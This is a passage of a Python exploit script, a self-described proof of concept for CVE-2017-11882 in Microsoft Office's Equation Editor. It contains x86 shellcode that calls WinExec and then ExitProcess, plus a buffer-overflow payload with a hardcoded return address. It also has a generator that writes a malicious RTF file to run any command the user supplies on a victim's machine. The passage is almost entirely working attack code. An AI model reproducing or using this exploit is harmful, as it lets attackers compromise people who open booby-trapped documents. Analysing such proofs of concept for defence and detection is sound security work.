27 | #0:  b8 44 eb 71 12          mov    eax,0x1271eb44
28 | #5:  ba 78 56 34 12          mov    edx,0x12345678
29 | #a:  31 d0                   xor    eax,edx
30 | #c:  8b 08                   mov    ecx,DWORD PTR [eax]
31 | #e:  8b 09                   mov    ecx,DWORD PTR [ecx]
32 | #10: 8b 09                   mov    ecx,DWORD PTR [ecx]
33 | #12: 66 83 c1 3c             add    cx,0x3c
34 | #16: 31 db                   xor    ebx,ebx
35 | #18: 53                      push   ebx
36 | #19: 51                      push   ecx
37 | #1a: be 64 3e 72 12          mov    esi,0x12723e64
38 | #1f: 31 d6                   xor    esi,edx
39 | #21: ff 16                   call   DWORD PTR [esi] // call WinExec
40 | #23: 53                      push   ebx
41 | #24: 66 83 ee 4c             sub    si,0x4c
42 | #28: ff 10                   call   DWORD PTR [eax] // call ExitProcess
43 | stage1="\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53\x66\x83\xEE\x4C\xFF\x10"
44 | 
45 | 
46 | # pads with nop
47 | stage1=stage1.ljust(44,'\x90')
48 | 
49 | def genrtf(cmd,r_head):
50 |     if len(cmd) > 109:
51 |         print "[!] Primitive command must be shorter than 109 bytes"
52 |         sys.exit(0)
53 |     payload='\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ'
54 |     payload+=stage1
55 |     payload+=pack('<I',0x00402114) # ret
56 |     payload+='\x00'*2
57 |     payload+=cmd
58 |     payload=payload.ljust(197,'\x00')
59 | 
60 |     return r_head+objclass+payload.encode('hex')+tail
61 | 
62 | def getrheader(file):
63 |     input_file = open(file,"r").read()
64 |     r_header = input_file.split("{\*\datastore")[0]
65 |     return r_header
66 | 
67 | if __name__ == '__main__':
68 |     parser = argparse.ArgumentParser(description="PoC for CVE-2017-11882")
69 |     parser.add_argument("-c", "--cmd", help="Command run in target system", required=True)
70 |     parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
71 |     parser.add_argument("-i", "--input", help="Input normal rtf.", required=False)
72 | 
73 |     args = parser.parse_args()
74 |     if args.input != None:
75 |         r_header = getrheader(args.input)
76 |     else:
77 |         r_header = head
78 | 
79 |     with open(args.output,'wb') as f:
80 |         f.write(genrtf(args.cmd,r_header))
81 |         f.close()
82 | 
83 |     print "[*] Done ! output file --> " + args.output 
84 | 
85 | 


--------------------------------------------------------------------------------